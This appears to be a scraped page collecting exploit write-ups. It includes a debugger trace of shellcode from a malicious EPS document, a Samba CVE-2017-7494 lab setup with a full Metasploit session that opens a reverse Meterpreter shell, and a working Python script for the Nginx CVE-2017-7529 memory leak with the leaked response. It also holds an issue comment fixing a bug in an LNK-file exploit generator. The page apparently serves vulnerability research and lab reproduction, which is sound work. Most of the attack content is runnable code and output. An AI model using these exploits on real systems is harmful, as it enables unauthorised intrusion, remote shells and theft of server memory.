061e2fd7 022b            add     ch,byte ptr [ebx]
061e2fd9 802100          and     byte ptr [ecx],0
061e2fdc 3a6b29          cmp     ch,byte ptr [ebx+29h]
061e2fdf 7428            je      061e3009  Branch

061e2fe0 2800            sub     byte ptr [eax],al

061e2fe1 0000            add     byte ptr [eax],al
061e2fe3 00c5            add     ch,al

061e2fee 292b            sub     dword ptr [ebx],ebp
061e2ff0 2b740000        sub     esi,dword ptr [eax+eax]
061e2ff4 0080451e92c1    add     byte ptr [eax-3E6DE1BBh],al
061e2ffa e301            jecxz   061e2ffd  Branch

061e2ffc c1737e5c        sal     dword ptr [ebx+7Eh],5Ch

061e2ffd 737e            jae     061e307d  Branch

061e2fff 5c              pop     esp

061e3000 aa              stos    byte ptr es:[edi]
061e3001 aa              stos    byte ptr es:[edi]
061e3002 aa              stos    byte ptr es:[edi]
061e3003 2afe            sub     bh,dh
061e3005 99              cdq
061e3006 e424            in      al,24h
061e3008 f9              stc

061e3009 d7              xlat    byte ptr [ebx]
061e300a c01f33          rcr     byte ptr [edi],33h
061e300d 3333            xor     esi,dword ptr [ebx]
061e300f 333a            xor     edi,dword ptr [edx]
061e3011 fb              sti

061e3012 c16382c4        shl     dword ptr [ebx-7Eh],0C4h
061e3016 3e7ef9          ht jle  061e3012  Branch

061e3019 d7              xlat    byte ptr [ebx]
061e301a c01f33          rcr     byte ptr [edi],33h
061e301d 3333            xor     esi,dword ptr [ebx]
061e301f 333a            xor     edi,dword ptr [edx]

061e3021 fb              sti
061e3022 c17782c4        sal     dword ptr [edi-7Eh],0C4h
061e3026 3e7cc5          ht jl   061e2fee  Branch

061e3029 22fe            and     bh,dh
061e302b 45              inc     ebp
061e302c 2afc            sub     bh,ah
061e302e 15682fafad      adc     eax,0ADAF2F68h
061e3033 64e1aa          loope   061e2fe0  Branch

061e3036 45              inc     ebp
061e3037 7640            jbe     061e3079  Branch

061e3039 62627f          bound   esp,qword ptr [edx+7Fh]

061e3079 008023323a28    add     byte ptr [eax+283A3223h],al

061e307d 3a28            cmp     ch,byte ptr [eax]

061e307f 39b7b1203232    cmp     dword ptr [edi+323220B1h],esi
061e3085 b9b2393980      mov     ecx,803939B2h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=00000000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f09 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f09 64a100000000    mov     eax,dword ptr fs:[00000000h] fs:003b:00000000=002bc95c

mem-eax-001

0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=002bc95c ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f0f esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f0f 8b4004          mov     eax,dword ptr [eax+4] ds:0023:002bc960=63c102c8
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c102c8 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f12 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f12 250000ffff      and     eax,0FFFF0000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63c10000=8bff
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a06
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a06
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63c00000=c63b
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63bf0000=0fc0
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63be0000=75ff
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63bd0000=458d
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63bc0000=8bf0
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bb0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17

mem-eax-002

References

  1. https://www.hybrid-analysis.com/sample/3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc?environmentId=100
  2. http://www.eteamz.com/ginysteams/files/POno46543.docx
  3. https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf
  4. https://www.ghostscript.com/
  5. http://blog.morphisec.com/exploit-bypass-emet-cve-2015-2545
  6. https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf
  7. https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html
  8. https://gist.github.com/subTee/54e72458af1c97f02e32
  9. http://casual-scrutiny.blogspot.jp/2016/02/cve-2015-2545-itw-emet-evasion.html
  10. https://blogs.msdn.microsoft.com/rihamselim/2012/03/14/breaking-on-module-load/
  11. https://stackoverflow.com/questions/10759661/manually-setting-breakpoints-in-windbg
  12. http://bbs.pediy.com/thread-216045.htm
  13. http://bbs.pediy.com/thread-216046.htm

[CVE-2017-7497] Samba - Remote code execution from a writable share

Bug Flow

-> /path/to/samba-X.X.XX

bug-flow

How to setup a vulnerable ENV ?

add the following contents into /etc/samba/smb.conf

[CVE20177494]
   comment = CVE20177494
   path = /tmp
   public = yes
   # available = yes
   # browseable = yes
   writable = yes
   # printable = yes
   # guest ok = yes
   create mask = 0777
   directory mask = 0777
  • vulnerable version: samba 4.5.2
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > set RHOSTS 192.168.206.144
RHOSTS => 192.168.206.144
msf auxiliary(smb_enumshares) > run

[+] 192.168.206.144:139   - print$ - (DISK) Printer Drivers
[+] 192.168.206.144:139   - CVE20177494 - (DISK) CVE20177494
[+] 192.168.206.144:139   - IPC$ - (IPC) IPC Service (Samba 4.5.2-Debian)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 192.168.206.144
RHOST => 192.168.206.144
msf exploit(is_known_pipename) > set target 0
target => 0
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST           192.168.206.144  yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(is_known_pipename) > run

[*] Started reverse TCP handler on 192.168.206.1:4444
[*] 192.168.206.144:445 - Using location \\192.168.206.144\CVE20177494\ for the path
[*] 192.168.206.144:445 - Hunting for payload using common path names: VZiaULDJ.so - //192.168.206.144/CVE20177494/
[*] 192.168.206.144:445 - Trying location /volume1/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume1/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume2/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume3/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /volume4/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /shared/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/usb/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /media/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /mnt/media/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/CVE20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /var/samba/Cve20177494/VZiaULDJ.so...
[*] 192.168.206.144:445 - Trying location /tmp/VZiaULDJ.so...
[*] Sending stage (797784 bytes) to 192.168.206.144
[*] Meterpreter session 1 opened (192.168.206.1:4444 -> 192.168.206.144:58682) at 2017-05-26 05:52:19 -0500

meterpreter > sysinfo
Computer     : sh.localdomain
OS           : Kali kali-rolling (Linux 4.6.0-kali1-686-pae)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > sysinfo
Computer     : sh.localdomain
OS           : Kali kali-rolling (Linux 4.6.0-kali1-686-pae)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > shell
Process 2702 created.
Channel 1 created.
smbd -V
Version 4.5.2-Debian

References

  1. https://www.samba.org/samba/security/CVE-2017-7494.html
  2. rapid7/metasploit-framework#8450

[Exploit] CVE-2017-7529 / Nginx - Remote Integer Overflow Vulnerability

Description

Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.

#!/usr/bin/python
# -*- coding:utf-8 -*-

# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529

import requests
import logging
import sys


logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def send_http_request(url, headers={}, timeout=8.0):
    httpResponse   = requests.get(url, headers=headers, timeout=timeout)
    httpHeaders    = httpResponse.headers

    log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
    return httpResponse


def exploit(url):
    log.info("target: %s", url)
    httpResponse   = send_http_request(url)

    content_length = httpResponse.headers.get('Content-Length', 0)
    bytes_length   = int(content_length) + 623
    content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)

    httpResponse   = send_http_request(url, headers={ 'Range': content_length })
    if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
        log.info("[+] Vulnerable to CVE-2017-7529")
    else:
        log.info("[?] Unknown Vulnerable")


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("[*] %s <url>" % sys.argv[0])
        sys.exit(1)

    url = sys.argv[1]
    exploit(url)


"""
GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT


--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585

.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png

"""

References

  1. https://nvd.nist.gov/vuln/detail/CVE-2017-7529
  2. https://hub.docker.com/r/vulapps/cve-2017-7529/

Bug at line number 232 when bindata is finally written into file (Windows Environment)

Hi,
First thanks for sharing this PoC.
When we run this code in windows OS to generate the the lnk file it introduces the character '\x0D' before the langth of the name (length will be 10 '\x0A' after including null char at end of name )i.e. "Microsoft" in this case. As name Microsoft is hard coded there it will always do this thing, but if you change the name to any other name whose length is 10 (including null byte) than this problem will persist there.
Reason: As we are writing the final data to the file in simple "write mode" rather than "write in binary mode" so it will write '\x0D\x0A" instead of '\x0A' beacause '\x0A' represents LF which will be replaced by CRLF (i.e. '\x0D\x0A') in windows.
Solution: need to change write mode to binary mode at line number 232. i.e.
with open(lnkpath, 'w') as lnkf:
change to
with open(lnkpath, 'wb') as lnkf:

and problem will be solved.
In Linux there is no problem.

Thanks

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.